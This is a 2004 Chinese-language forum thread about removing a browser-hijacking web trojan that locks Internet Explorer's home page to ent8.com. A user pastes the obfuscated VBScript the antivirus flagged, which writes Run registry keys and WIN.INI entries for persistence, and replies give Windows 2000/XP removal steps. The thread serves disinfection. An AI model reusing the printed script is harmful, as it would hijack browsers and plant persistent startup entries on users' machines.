http://a.ent8.com好像狠厲害，老清不掉

psac · 2004-01-13, 10:38 AM

Q:
http://a.ent8.com好像狠厲害，老清不掉
註冊表裡清掉了，重新啟動又有了
A:
薦查啟動列表。
今天刪www.aogo.net就是在啟動組裡發現多出一個Registry.exe在System32目錄下。

================================

Q:
我每次經系統的是後，瑞星殺毒軟體老是提醒我有可疑程式碼，問我是否跳過，直接如下
當前正在執行的程式的名稱和開啟的文件的名稱是：
C:\WINNT\System32\WScript.exe "C:\$NtUninstallQ887678$\WINSYS.vbs"

*********************************************************************************************
可疑程式碼的動作如下：
有寫註冊表的動作
有寫文件的動作
有讀文件的動作

*********************************************************************************************
可疑程式碼顯示如下：
Set sss = CreateObject("WSc" + "ript.Sh" + "ell")
mhk="HK"&"LM\SO"&"FTWARE\Mi"&"cr"&"os"&"oft\Win"&"dows\Cu"&"rren"&"tVersion\Run\"
mhc="H"&"K"&"CU\So"&"ft"&"ware\Mic"&"ros"&"oft\Win"&"dows\Curren"&"tVersion\Run\"
mhk2="HK"&"LM\SO"&"FT"&"WARE\M"&"icr"&"osoft\Wi"&"n"&"dows\Curren"&"tVersion\"
sss.RegWrite ""&mhk&"WlN32","regedit -s C:\$NtUninstallQ887678$\WINSYS.cer"
sss.RegWrite ""&mhk&"internat.exe","internat.exe"
sss.RegWrite ""&mhk&"zwupdows","12"
sss.RegWrite ""&mhk&"win","12"
sss.RegWrite ""&mhk&"mwin","12"
sss.RegWrite ""&mhk&"internt","12"
sss.RegWrite ""&mhk&"Inernet","12"
sss.RegWrite ""&mhk&"Internet","12"
sss.RegWrite ""&mhk&"iexpleror","12"
sss.RegWrite ""&mhk&"zxdows","12"
sss.RegWrite ""&mhk&"qwe","12"
sss.RegWrite ""&mhk&"win1","12"
sss.RegWrite ""&mhk&"intelnat.exe","12"
sss.RegWrite ""&mhk&"u1888","12"
sss.RegWrite ""&mhk&"intenet","12"
sss.RegWrite ""&mhk&"9i5zxdows","12"
sss.RegWrite ""&mhk&"9i5com01zxdows","12"
sss.RegWrite ""&mhk&"99zxdows","12"
sss.RegWrite ""&mhk&"88zxdows","12"
sss.RegWrite ""&mhk&"Start Pagewin","12"
sss.RegWrite ""&mhk&"Start Page","12"
sss.RegWrite ""&mhk&"u188","12"
sss.RegWrite ""&mhk&"9i5comzxdows","12"
sss.RegWrite ""&mhk&"9q5zxdows","12"
sss.RegWrite ""&mhk&"u1881","12"
sss.RegWrite ""&mhk&"u1882","12"
sss.RegWrite ""&mhk&"u1883","12"
sss.RegWrite ""&mhk&"u1884","12"
sss.RegWrite ""&mhk&"u1885","12"
sss.RegWrite ""&mhk&"u1886","12"
sss.RegWrite ""&mhk&"u1887","12"
sss.RegWrite ""&mhk&"u88y", "12"
sss.RegWrite ""&mhk&"flash", "12"
sss.RegWrite ""&mhk&"999izxdows","12"
sss.RegWrite ""&mhk&"033zxdows","12"
sss.RegWrite ""&mhk&"syste","12"
sss.RegWrite ""&mhc&"my","12"
sss.RegWrite ""&mhk&"3zxdows","12"
sss.RegWrite ""&mhk&"88u88","12"
sss.RegWrite ""&mhk&"system","12"
sss.RegWrite ""&mhk&"8zxdows","12"
sss.RegWrite ""&mhk&"u18","12"
sss.RegWrite ""&mhk&"interneet.exe","12"
sss.RegWrite ""&mhk2&"RunOnce\", "12"
sss.RegWrite ""&mhk&"iexpler", "12"
sss.RegWrite ""&mhk&"u1810", "12"
sss.RegWrite ""&mhk&"winwin", "12"
sss.RegWrite ""&mhk&"WIN32", "12"
sss.RegWrite ""&mhk&"W1N32", "12"
sss.RegDelete ""&mhc&""
sss.RegDelete ""&mhk&"zwupdows"
sss.RegDelete ""&mhk&"win"
sss.RegDelete ""&mhk&"mwin"
sss.RegDelete ""&mhk&"internt"
sss.RegDelete ""&mhk&"inernet"
sss.RegDelete ""&mhk&"Internet"
sss.RegDelete ""&mhk&"u188"
sss.RegDelete ""&mhk&"iexpleror"
sss.RegDelete ""&mhk&"zxdows"
sss.RegDelete ""&mhk&"qwe"
sss.RegDelete ""&mhk&"win1"
sss.RegDelete ""&mhk&"intelnat.exe"
sss.RegDelete ""&mhk&"intenet"
sss.RegDelete ""&mhk&"9i5zxdows"
sss.RegDelete ""&mhk&"9i5com01zxdows"
sss.RegDelete ""&mhk&"99zxdows"
sss.RegDelete ""&mhk&"88zxdows"
sss.RegDelete ""&mhk&"Start Pagewin"
sss.RegDelete ""&mhk&"Start Page"
sss.RegDelete ""&mhk&"9i5comzxdows"
sss.RegDelete ""&mhk&"9q5zxdows"
sss.RegDelete ""&mhk&"999izxdows"
sss.RegDelete ""&mhk&"033zxdows"
sss.RegDelete ""&mhk&"u1881"
sss.RegDelete ""&mhk&"u1882"
sss.RegDelete ""&mhk&"u1883"
sss.RegDelete ""&mhk&"u1884"
sss.RegDelete ""&mhk&"u1885"
sss.RegDelete ""&mhk&"u1886"
sss.RegDelete ""&mhk&"u1887"
sss.RegDelete ""&mhk&"u88y"
sss.RegDelete ""&mhk&"flash"
sss.RegDelete ""&mhk&"88u88"
sss.RegDelete ""&mhk&"interneet.exe"
sss.RegDelete ""&mhk&"u18"
sss.RegDelete ""&mhk&"u1888"
sss.RegDelete ""&mhk&"system"
sss.RegDelete ""&mhk&"3zxdows"
sss.RegDelete ""&mhk&"8zxdows"
sss.RegDelete ""&mhk&"syste"
sss.RegDelete ""&mhk2&"RunOnce\"
sss.RegDelete ""&mhk&"iexpler"
sss.RegDelete ""&mhk&"u1810"
sss.RegDelete ""&mhk&"winwin"
sss.RegDelete ""&mhk&"WIN32"
sss.RegDelete ""&mhk&"W1N32"

Set FSO = CreateObject("Scrip" + "ting." + "FileSyst" + "emO" + "bject")
myfile14=FSO.FileExists("c:\wind" + "ows\W" + "IN.INI")
if myfile14 then
set FSO2=FSO.OpenTextFile("c:\win" + "dows\W" + "IN.INI")
mywin=FSO2.ReadALL()
l=Instr(mywin,"run=")-3
m=Instr(mywin,"load=")-1
n=Instr(mywin,"NullPort=")-3
FSO2.close
if l>0 and m>0 and l>m then
set FSO3=FSO.OpenTextFile("c:\wi" + "ndows\W" + "IN.INI")
mywin2=FSO3.Read(l)
FSO3.close
set FSO4=FSO.OpenTextFile("c:\win" + "dows\WI" + "N.INI")
mywin3=FSO4.Read(m)
FSO4.close
if n>0 and n>l then
set FSO5=FSO.OpenTextFile("c:\wind" + "ows\WIN" + ".INI")
mywin4=FSO5.Read(n)
FSO5.close
mywin=Replace(mywin,mywin4,"")
set FSO2=FSO.CreateTextFile("c:\win" + "dows\WI" + "N.INI")
FSO2.Write mywin3
FSO2.WriteLine "load="
FSO2.Write "run="
FSO2.Write mywin
FSO2.close
else
mywin=Replace(mywin,mywin2,"")
set FSO2=FSO.CreateTextFile("c:\win" + "dows\WI" + "N.INI")
FSO2.Write mywin3
FSO2.Write "load="
FSO2.Write mywin
FSO2.close
end if
end if
end if

請問大俠，這段程式碼是幹什麼用的阿？我看不懂，不會是木馬吧
還有就是我每次開機ie（6.0）主頁總是為[url]http://www.ent8.com/，我在註冊表中把和http://www.ent8.com/匹配的健值刪除，用ie還原軟體修復後，就可以和原來一樣用了。可是一重新啟動電腦，就又出涵/url]{這樣的問題，請問大俠怎麼解決這個問題！讓我的ie恢復成最初的狀態

A:
字串裡都拆開寫，這麼鬼祟的程式碼，肯定沒幹好事
居然在Run和Win.ini裡加了那麼多程序
把C:\$NtUninstallQ887678$ 資料夾刪除
是個木馬，刪之
Q:
沒有C碟下的那個目錄啊，是不是wscript.exe

A:

是個隱含目錄，可惡的惡意程式碼
的確是網頁木馬
參考一下清除方法
http://www.canglou.com/ShowArticle.asp?ArticleID=1858

$NtUninstallQ……$\WINSYS .CER 惡意程式碼清除方法小結
〔這幾天一些惡意網站的惡意程式碼鬧得挺凶，像是www.58q.com www.qq230.com 這樣欠黑的網站
一開啟這些網頁就中了惡意指令碼，而且一般的IE修復和殺毒軟體都不能比較徹底清除

典型症狀：

1. IE 首頁被改為惡意網站，預設主頁，起始頁，甚至搜尋頁全部被更改

2. C碟下產生資料夾：$NtUninstallQxxxxxxx$（x代表數字）
從名字上看企圖冒充微軟更新修正檔的卸載資料夾，並且在Win2000/XP下擁有系統檔案級隱藏內容，比較隱蔽。資料夾中包含了惡意指令碼文件winsys.vbs、winsys.cer

3. 隨機啟動項被增加3項：

4. 如用殺毒軟體查殺，可以查到名為Harm.Reg.WebImport.g 的病毒，但若是清除不徹底，只是刪除了資料夾，開機將會出現提示：

清除方法小結：

1. 刪除啟動項：

建議通過msconfig 、最佳化軟體禁用或註冊表手動刪除以上3項啟動項

HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Run
刪除：regedit -s C:\$NtUninstallQxxxxxxx$\WINSYS.cer

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
刪除：Sys32，值為：C:\$NtUninstallQxxxxxxx$\WINSYS.vbs

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
刪除：Sys32，值為：regedit -s C:\$NtUninstallQxxxxxxx$\WINSYS.cer
刪除：internat.exe，值為：internat.exe

2. 刪除資料夾：

資料夾選項設定

然後刪除整個$NtUninstallQxxxxxxx$ 目錄

3. 清理註冊表：

記下惡意網站的域名，以它為關鍵字搜尋註冊表或用註冊表清理工具，因為惡意網站的名字會替換註冊表中所有IE 預設起始頁、預設搜尋頁、預設主頁等鍵值。
一旦通過這種方式再次開啟惡意網站，以上做的就白費了，所以清理完以前暫時不要開啟IE，如需要訪問某些網站，可以通過執行輸入網址或收藏夾等方式訪問。

根據惡意程式碼的內容，附上被修改的註冊表鍵值，供參考：

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchURL
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search\SearchAssistant

HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\SearchURL
HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Main\Search Page
HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Main\Default_Search_URL
HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Main\Search Bar
HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Search\SearchAssistant

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search\SearchAssistant
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\First Home Page
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Default_Search_URL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Search Page
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Search Bar
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Local Page
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Default_Page_URL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\SearchURL

4. 清理完成後：

建議遮閉此類網站，直接方法可以搜尋以前的討論，建議試試通過Hosts 遮閉，嘿嘿

另外對WinXP或安裝文字服務的系統，清除惡意程式碼後，工作管理欄上的輸入法指示器可能消失，無法使用輸入法
偶個人試驗一下，在開始>執行中輸入：ctfmon.exe，啟動輸入法指示器並加入隨機啟動組，一般可以解決這個問題，如果問題依舊，請開新帖討論

補充說明：

系統檔案夾（\WINNT或\Windows）下出現的如$NtUninstallQ823980$ 、$NtUninstallQ814033$ 這類資料夾是Windows Update 或安裝微軟修正檔程序留下的卸載信息，用來卸載已安裝的修正檔，按修正檔的編號如Q823980、Q814033 可以在微軟的網站查到相應的說明。請注意與惡意程式碼建立的資料夾區分

如果不打算卸載已經安裝的修正檔，這些資料夾也是可以安全移除的

2004-01-13, 10:38 AM	#1
psac 榮譽會員榮譽勳章勳章總數19 UID - 3662 在線等級: 註冊日期: 2002-12-07 住址: 木柵市立動物園文章: 17381 精華: 2 現金: 5253 金幣資產: 33853 金幣	http://a.ent8.com好像狠厲害，老清不掉 Q: http://a.ent8.com好像狠厲害，老清不掉註冊表裡清掉了，重新啟動又有了 A: 薦查啟動列表。今天刪www.aogo.net就是在啟動組裡發現多出一個Registry.exe在System32目錄下。 ================================ Q: 我每次經系統的是後，瑞星殺毒軟體老是提醒我有可疑程式碼，問我是否跳過，直接如下當前正在執行的程式的名稱和開啟的文件的名稱是： C:\WINNT\System32\WScript.exe "C:\$NtUninstallQ887678$\WINSYS.vbs" ******************************************************************************************* 可疑程式碼的動作如下：有寫註冊表的動作有寫文件的動作有讀文件的動作 ******************************************************************************************* 可疑程式碼顯示如下： Set sss = CreateObject("WSc" + "ript.Sh" + "ell") mhk="HK"&"LM\SO"&"FTWARE\Mi"&"cr"&"os"&"oft\Win"&"dows\Cu"&"rren"&"tVersion\Run\" mhc="H"&"K"&"CU\So"&"ft"&"ware\Mic"&"ros"&"oft\Win"&"dows\Curren"&"tVersion\Run\" mhk2="HK"&"LM\SO"&"FT"&"WARE\M"&"icr"&"osoft\Wi"&"n"&"dows\Curren"&"tVersion\" sss.RegWrite ""&mhk&"WlN32","regedit -s C:\$NtUninstallQ887678$\WINSYS.cer" sss.RegWrite ""&mhk&"internat.exe","internat.exe" sss.RegWrite ""&mhk&"zwupdows","12" sss.RegWrite ""&mhk&"win","12" sss.RegWrite ""&mhk&"mwin","12" sss.RegWrite ""&mhk&"internt","12" sss.RegWrite ""&mhk&"Inernet","12" sss.RegWrite ""&mhk&"Internet","12" sss.RegWrite ""&mhk&"iexpleror","12" sss.RegWrite ""&mhk&"zxdows","12" sss.RegWrite ""&mhk&"qwe","12" sss.RegWrite ""&mhk&"win1","12" sss.RegWrite ""&mhk&"intelnat.exe","12" sss.RegWrite ""&mhk&"u1888","12" sss.RegWrite ""&mhk&"intenet","12" sss.RegWrite ""&mhk&"9i5zxdows","12" sss.RegWrite ""&mhk&"9i5com01zxdows","12" sss.RegWrite ""&mhk&"99zxdows","12" sss.RegWrite ""&mhk&"88zxdows","12" sss.RegWrite ""&mhk&"Start Pagewin","12" sss.RegWrite ""&mhk&"Start Page","12" sss.RegWrite ""&mhk&"u188","12" sss.RegWrite ""&mhk&"9i5comzxdows","12" sss.RegWrite ""&mhk&"9q5zxdows","12" sss.RegWrite ""&mhk&"u1881","12" sss.RegWrite ""&mhk&"u1882","12" sss.RegWrite ""&mhk&"u1883","12" sss.RegWrite ""&mhk&"u1884","12" sss.RegWrite ""&mhk&"u1885","12" sss.RegWrite ""&mhk&"u1886","12" sss.RegWrite ""&mhk&"u1887","12" sss.RegWrite ""&mhk&"u88y", "12" sss.RegWrite ""&mhk&"flash", "12" sss.RegWrite ""&mhk&"999izxdows","12" sss.RegWrite ""&mhk&"033zxdows","12" sss.RegWrite ""&mhk&"syste","12" sss.RegWrite ""&mhc&"my","12" sss.RegWrite ""&mhk&"3zxdows","12" sss.RegWrite ""&mhk&"88u88","12" sss.RegWrite ""&mhk&"system","12" sss.RegWrite ""&mhk&"8zxdows","12" sss.RegWrite ""&mhk&"u18","12" sss.RegWrite ""&mhk&"interneet.exe","12" sss.RegWrite ""&mhk2&"RunOnce\", "12" sss.RegWrite ""&mhk&"iexpler", "12" sss.RegWrite ""&mhk&"u1810", "12" sss.RegWrite ""&mhk&"winwin", "12" sss.RegWrite ""&mhk&"WIN32", "12" sss.RegWrite ""&mhk&"W1N32", "12" sss.RegDelete ""&mhc&"" sss.RegDelete ""&mhk&"zwupdows" sss.RegDelete ""&mhk&"win" sss.RegDelete ""&mhk&"mwin" sss.RegDelete ""&mhk&"internt" sss.RegDelete ""&mhk&"inernet" sss.RegDelete ""&mhk&"Internet" sss.RegDelete ""&mhk&"u188" sss.RegDelete ""&mhk&"iexpleror" sss.RegDelete ""&mhk&"zxdows" sss.RegDelete ""&mhk&"qwe" sss.RegDelete ""&mhk&"win1" sss.RegDelete ""&mhk&"intelnat.exe" sss.RegDelete ""&mhk&"intenet" sss.RegDelete ""&mhk&"9i5zxdows" sss.RegDelete ""&mhk&"9i5com01zxdows" sss.RegDelete ""&mhk&"99zxdows" sss.RegDelete ""&mhk&"88zxdows" sss.RegDelete ""&mhk&"Start Pagewin" sss.RegDelete ""&mhk&"Start Page" sss.RegDelete ""&mhk&"9i5comzxdows" sss.RegDelete ""&mhk&"9q5zxdows" sss.RegDelete ""&mhk&"999izxdows" sss.RegDelete ""&mhk&"033zxdows" sss.RegDelete ""&mhk&"u1881" sss.RegDelete ""&mhk&"u1882" sss.RegDelete ""&mhk&"u1883" sss.RegDelete ""&mhk&"u1884" sss.RegDelete ""&mhk&"u1885" sss.RegDelete ""&mhk&"u1886" sss.RegDelete ""&mhk&"u1887" sss.RegDelete ""&mhk&"u88y" sss.RegDelete ""&mhk&"flash" sss.RegDelete ""&mhk&"88u88" sss.RegDelete ""&mhk&"interneet.exe" sss.RegDelete ""&mhk&"u18" sss.RegDelete ""&mhk&"u1888" sss.RegDelete ""&mhk&"system" sss.RegDelete ""&mhk&"3zxdows" sss.RegDelete ""&mhk&"8zxdows" sss.RegDelete ""&mhk&"syste" sss.RegDelete ""&mhk2&"RunOnce\" sss.RegDelete ""&mhk&"iexpler" sss.RegDelete ""&mhk&"u1810" sss.RegDelete ""&mhk&"winwin" sss.RegDelete ""&mhk&"WIN32" sss.RegDelete ""&mhk&"W1N32" Set FSO = CreateObject("Scrip" + "ting." + "FileSyst" + "emO" + "bject") myfile14=FSO.FileExists("c:\wind" + "ows\W" + "IN.INI") if myfile14 then set FSO2=FSO.OpenTextFile("c:\win" + "dows\W" + "IN.INI") mywin=FSO2.ReadALL() l=Instr(mywin,"run=")-3 m=Instr(mywin,"load=")-1 n=Instr(mywin,"NullPort=")-3 FSO2.close if l>0 and m>0 and l>m then set FSO3=FSO.OpenTextFile("c:\wi" + "ndows\W" + "IN.INI") mywin2=FSO3.Read(l) FSO3.close set FSO4=FSO.OpenTextFile("c:\win" + "dows\WI" + "N.INI") mywin3=FSO4.Read(m) FSO4.close if n>0 and n>l then set FSO5=FSO.OpenTextFile("c:\wind" + "ows\WIN" + ".INI") mywin4=FSO5.Read(n) FSO5.close mywin=Replace(mywin,mywin4,"") set FSO2=FSO.CreateTextFile("c:\win" + "dows\WI" + "N.INI") FSO2.Write mywin3 FSO2.WriteLine "load=" FSO2.Write "run=" FSO2.Write mywin FSO2.close else mywin=Replace(mywin,mywin2,"") set FSO2=FSO.CreateTextFile("c:\win" + "dows\WI" + "N.INI") FSO2.Write mywin3 FSO2.Write "load=" FSO2.Write mywin FSO2.close end if end if end if 請問大俠，這段程式碼是幹什麼用的阿？我看不懂，不會是木馬吧還有就是我每次開機ie（6.0）主頁總是為[url]http://www.ent8.com/，我在註冊表中把和http://www.ent8.com/匹配的健值刪除，用ie還原軟體修復後，就可以和原來一樣用了。可是一重新啟動電腦，就又出涵/url]{這樣的問題，請問大俠怎麼解決這個問題！讓我的ie恢復成最初的狀態 A: 字串裡都拆開寫，這麼鬼祟的程式碼，肯定沒幹好事居然在Run和Win.ini裡加了那麼多程序把C:\$NtUninstallQ887678$ 資料夾刪除是個木馬，刪之 Q: 沒有C碟下的那個目錄啊，是不是wscript.exe A: 是個隱含目錄，可惡的惡意程式碼的確是網頁木馬參考一下清除方法 http://www.canglou.com/ShowArticle.asp?ArticleID=1858 $NtUninstallQ……$\WINSYS .CER 惡意程式碼清除方法小結〔這幾天一些惡意網站的惡意程式碼鬧得挺凶，像是www.58q.com www.qq230.com 這樣欠黑的網站一開啟這些網頁就中了惡意指令碼，而且一般的IE修復和殺毒軟體都不能比較徹底清除典型症狀： 1. IE 首頁被改為惡意網站，預設主頁，起始頁，甚至搜尋頁全部被更改 2. C碟下產生資料夾：$NtUninstallQxxxxxxx$（x代表數字）從名字上看企圖冒充微軟更新修正檔的卸載資料夾，並且在Win2000/XP下擁有系統檔案級隱藏內容，比較隱蔽。資料夾中包含了惡意指令碼文件winsys.vbs、winsys.cer 3. 隨機啟動項被增加3項： 4. 如用殺毒軟體查殺，可以查到名為Harm.Reg.WebImport.g 的病毒，但若是清除不徹底，只是刪除了資料夾，開機將會出現提示：清除方法小結： 1. 刪除啟動項：建議通過msconfig 、最佳化軟體禁用或註冊表手動刪除以上3項啟動項 HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Run HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Run 刪除：regedit -s C:\$NtUninstallQxxxxxxx$\WINSYS.cer HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce 刪除：Sys32，值為：C:\$NtUninstallQxxxxxxx$\WINSYS.vbs HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 刪除：Sys32，值為：regedit -s C:\$NtUninstallQxxxxxxx$\WINSYS.cer 刪除：internat.exe，值為：internat.exe 2. 刪除資料夾：資料夾選項設定然後刪除整個$NtUninstallQxxxxxxx$ 目錄 3. 清理註冊表：記下惡意網站的域名，以它為關鍵字搜尋註冊表或用註冊表清理工具，因為惡意網站的名字會替換註冊表中所有IE 預設起始頁、預設搜尋頁、預設主頁等鍵值。一旦通過這種方式再次開啟惡意網站，以上做的就白費了，所以清理完以前暫時不要開啟IE，如需要訪問某些網站，可以通過執行輸入網址或收藏夾等方式訪問。根據惡意程式碼的內容，附上被修改的註冊表鍵值，供參考： HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchURL HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search\SearchAssistant HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\SearchURL HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Main\Search Page HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Main\Default_Search_URL HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Main\Search Bar HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Search\SearchAssistant HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search\SearchAssistant HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\First Home Page HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Default_Search_URL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Search Page HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Search Bar HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Local Page HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Default_Page_URL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\SearchURL 4. 清理完成後：建議遮閉此類網站，直接方法可以搜尋以前的討論，建議試試通過Hosts 遮閉，嘿嘿另外對WinXP或安裝文字服務的系統，清除惡意程式碼後，工作管理欄上的輸入法指示器可能消失，無法使用輸入法偶個人試驗一下，在開始>執行中輸入：ctfmon.exe，啟動輸入法指示器並加入隨機啟動組，一般可以解決這個問題，如果問題依舊，請開新帖討論補充說明：系統檔案夾（\WINNT或\Windows）下出現的如$NtUninstallQ823980$ 、$NtUninstallQ814033$ 這類資料夾是Windows Update 或安裝微軟修正檔程序留下的卸載信息，用來卸載已安裝的修正檔，按修正檔的編號如Q823980、Q814033 可以在微軟的網站查到相應的說明。請注意與惡意程式碼建立的資料夾區分如果不打算卸載已經安裝的修正檔，這些資料夾也是可以安全移除的

	送花文章: 3, 收花文章: 1631 篇, 收花: 3205 次

Google 提供的廣告